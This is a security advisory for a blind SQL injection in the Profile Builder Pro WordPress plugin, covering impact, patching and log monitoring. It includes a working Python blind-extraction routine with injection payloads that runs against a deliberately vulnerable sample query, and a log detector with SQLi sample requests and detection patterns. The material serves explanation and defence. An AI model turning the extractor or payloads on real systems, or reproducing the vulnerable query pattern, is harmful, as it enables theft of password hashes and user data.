CVE-2026-27413

Cozmoslabs · Profile Builder Pro

Cozmoslabs Profile Builder Pro is vulnerable to Blind SQL Injection, allowing attackers to extract sensitive information from the database by sending crafted queries.

Executive summary

A critical Blind SQL Injection vulnerability in Profile Builder Pro allows an unauthenticated or low-privileged attacker to silently exfiltrate sensitive database contents, including user password hashes and site configuration data, one true/false answer at a time.

Vulnerability

The plugin does not properly neutralize special elements in user-supplied input before that input is used in an SQL command (CWE-89). The injection is "blind": the query result is never reflected in the page, so the attacker instead asks the database a series of yes/no questions and reads the answer from a side channel, either a difference in the response content (boolean-based) or an induced delay such as SLEEP() (time-based). Suppressing database error messages does not help; with a binary search each character of a column costs roughly seven requests, so a full password hash can be recovered in a few hundred requests.
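To make the inference mechanism concrete, the following is an added example, not code from Cozmoslabs or the Profile Builder Pro plugin. It simulates a boolean-based blind injection against an in-memory SQLite table standing in for wp_users. The vulnerable lookup function, the table contents and the hash value are all constructed for illustration and do not describe the plugin's actual vulnerable endpoint or parameter. The extraction routine recovers a column using nothing but true/false answers, and the same payloads sent to the parameterised variant leak nothing.

```python
import sqlite3

# Constructed sample data: one WordPress-style user row. The hash is a made-up
# phpass-looking placeholder, not a real credential.
SAMPLE_HASH = "$P$BexampleHash.NotReal0123456"
MAX_LEN = 64


def build_db():
    """In-memory stand-in for a WordPress database (table name mirrors wp_users)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)"
    )
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SAMPLE_HASH,))
    return conn


def username_exists_vulnerable(conn, login):
    """Illustrative CWE-89 pattern: untrusted input concatenated into the SQL text.
    The caller only learns True/False, which is all a blind attack needs."""
    sql = f"SELECT COUNT(*) FROM wp_users WHERE user_login = '{login}'"
    return conn.execute(sql).fetchone()[0] > 0


def username_exists_safe(conn, login):
    """Hardened form: the value is bound as a parameter and cannot alter the query
    structure (the WordPress equivalent is $wpdb->prepare() with a %s placeholder)."""
    sql = "SELECT COUNT(*) FROM wp_users WHERE user_login = ?"
    return conn.execute(sql, (login,)).fetchone()[0] > 0


def blind_extract(oracle, column="user_pass", row_id=1, max_len=MAX_LEN):
    """Recover one column value using only a yes/no oracle.

    oracle(payload) returns True when the injected condition holds. Every integer
    is found by binary search over "> N" questions, so one character costs about
    seven requests. SQLite spells the helpers unicode()/substr(); the MySQL
    equivalents are ASCII()/SUBSTRING()."""

    def ask(expr, threshold):
        # The trailing AND ''=' re-closes the quote the application opened, so no
        # comment sequence is needed and the statement stays syntactically valid.
        return oracle(f"' OR ({expr}) > {threshold} AND ''='")

    def search(expr, low, high):
        # Invariant: the true value of expr lies in [low, high].
        while low < high:
            mid = (low + high) // 2
            if ask(expr, mid):
                low = mid + 1
            else:
                high = mid
        return low

    where = f"FROM wp_users WHERE ID = {row_id}"
    length = search(f"SELECT length({column}) {where}", 0, max_len)
    return "".join(
        chr(search(f"SELECT unicode(substr({column}, {pos}, 1)) {where}", 0, 127))
        for pos in range(1, length + 1)
    )


def demo():
    """Run the extraction against both variants and report what leaked."""
    conn = build_db()
    counter = {"queries": 0}

    def vulnerable_oracle(payload):
        counter["queries"] += 1
        return username_exists_vulnerable(conn, payload)

    leaked = blind_extract(vulnerable_oracle)
    # Against the parameterised query the payloads are just odd usernames that
    # never match, so the length search bottoms out at 0 and nothing is recovered.
    hardened_leak = blind_extract(lambda p: username_exists_safe(conn, p))
    return {"leaked": leaked, "queries": counter["queries"], "hardened_leak": hardened_leak}


if __name__ == "__main__":
    print(demo())
```

The request count is what makes this class of bug practical: the example recovers a 30-character value in about 217 oracle calls, and a time-based variant only changes how the oracle reads its answer, not how many questions it asks.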

Business impact

With a CVSS score of 9.3, this vulnerability is a major threat to data confidentiality. An attacker can extract password hashes, personal information and site metadata; hashes can be cracked offline and reused, and the data can be leveraged for further attacks or sold. A breach of this kind can also lead to regulatory fines and a loss of customer trust.

Remediation

Immediate Action: Update Cozmoslabs Profile Builder Pro to a fixed release (any version later than 3.13.9), which corrects the improper query handling. Because the flaw is exploitable without visible errors, assume exposure for the period the vulnerable version was installed and consider rotating credentials and secrets stored in the database.

Proactive Monitoring: Monitor database logs (for example the MySQL general or slow query log) for queries containing SLEEP(), BENCHMARK() or unusual SUBSTRING()/ASCII() comparisons, and inspect web server access logs for requests whose response time is a whole number of seconds (slightly over 5 or 10 seconds is typical of SLEEP(5)/SLEEP(10) payloads). Time-based detection requires response-time logging (Apache %D, nginx $request_time). Boolean-based probing produces no delay at all; it shows up instead as a burst of near-identical requests from one client to one endpoint, differing only in a quoted parameter value.
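The following added example (not part of the original advisory or the plugin) runs both of those checks over a few constructed Apache access-log lines. It assumes the "combined" log format with the response time in microseconds (%D) appended as a final field; the client addresses are from documentation ranges and the path and parameter names are hypothetical, not the plugin's vulnerable endpoint. Per-request classification catches time-based payloads; the per-client aggregate catches boolean-based probing that leaves no timing signal.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log with %D (response time in microseconds) appended as the
# last field. The presence of that field is an assumption about the log config.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<bytes>\S+) (?P<usec>\d+)$"
)
# Delay primitives used by time-based payloads (MySQL, PostgreSQL, MSSQL).
TIME_FUNC_RE = re.compile(r"(?i)\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b")
QUOTE_RE = re.compile(r"['\"]")

# Constructed sample lines (hypothetical path/parameter; not the plugin's endpoint).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2026:10:00:01 +0000] "GET /?example_param=foo HTTP/1.1" 200 5120 4012
203.0.113.10 - - [12/Mar/2026:10:00:02 +0000] "GET /?example_param=foo%27%20AND%201%3D1--%20 HTTP/1.1" 200 5120 3987
203.0.113.10 - - [12/Mar/2026:10:00:02 +0000] "GET /?example_param=foo%27%20AND%201%3D2--%20 HTTP/1.1" 200 4870 3501
203.0.113.10 - - [12/Mar/2026:10:00:03 +0000] "GET /?example_param=foo%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 4870 5003117
203.0.113.10 - - [12/Mar/2026:10:00:09 +0000] "GET /?example_param=foo%27%20AND%20SLEEP(10)--%20 HTTP/1.1" 200 4870 10002944
198.51.100.7 - - [12/Mar/2026:10:00:09 +0000] "GET /wp-content/uploads/report.pdf HTTP/1.1" 200 2048000 5000123
198.51.100.8 - - [12/Mar/2026:10:00:10 +0000] "GET /blog/sleep-better-tips/?ref=newsletter HTTP/1.1" 200 9100 118230
"""


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "path": parts.path,
        "query": unquote_plus(parts.query),  # decode once so %27 and friends are visible
        "status": int(m["status"]),
        "seconds": int(m["usec"]) / 1_000_000,
    }


def classify(entry, tolerance=0.05, min_seconds=2):
    """Return a confidence label for one request, or None if it looks benign."""
    whole = round(entry["seconds"])
    delayed = whole >= min_seconds and abs(entry["seconds"] - whole) <= tolerance
    has_delay_func = bool(TIME_FUNC_RE.search(entry["query"]))
    if has_delay_func and delayed:
        return "high"    # payload asked for a delay and the server obliged
    if has_delay_func:
        return "medium"  # payload present but no delay observed (filtered or patched)
    if delayed and QUOTE_RE.search(entry["query"]):
        return "low"     # whole-second timing plus a quote in a parameter
    return None          # e.g. a slow static download with a clean query string


def probing_clients(entries, threshold=3):
    """Boolean-based probing leaves no delay: flag one client sending several
    quote-bearing parameter values to the same path."""
    counts = Counter(
        (e["ip"], e["path"]) for e in entries if QUOTE_RE.search(e["query"])
    )
    return {key: n for key, n in counts.items() if n >= threshold}


def analyze(log_text):
    """Run both heuristics over a block of log text."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    timing = []
    for e in entries:
        confidence = classify(e)
        if confidence:
            timing.append({**e, "confidence": confidence})
    return {"timing": timing, "probing": probing_clients(entries)}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for f in result["timing"]:
        print(f'{f["confidence"]:6} {f["ip"]} {f["seconds"]:.3f}s {f["query"]}')
    print("probing:", result["probing"])
```

On the sample input the two SLEEP() requests are flagged as high confidence, the 5-second PDF download is ignored because nothing in its query string looks like a payload, and the client that sent four quoted variants of the same parameter is reported by the aggregate check even though none of its boolean probes took measurable time. The tolerance and threshold values are starting points to tune against real traffic.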

Compensating Controls: Until the patch is applied, use a Web Application Firewall (WAF) with SQL injection rules enabled to filter payloads aimed at database-backed parameters. Treat this as a stopgap rather than a substitute for the update: blind injection payloads are short and easily obfuscated, so signature-based filtering can be bypassed.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Organizations must prioritize the application of the patch. The ability to extract the entire database through blind injection is a critical risk that must be mitigated immediately to protect sensitive user and corporate data.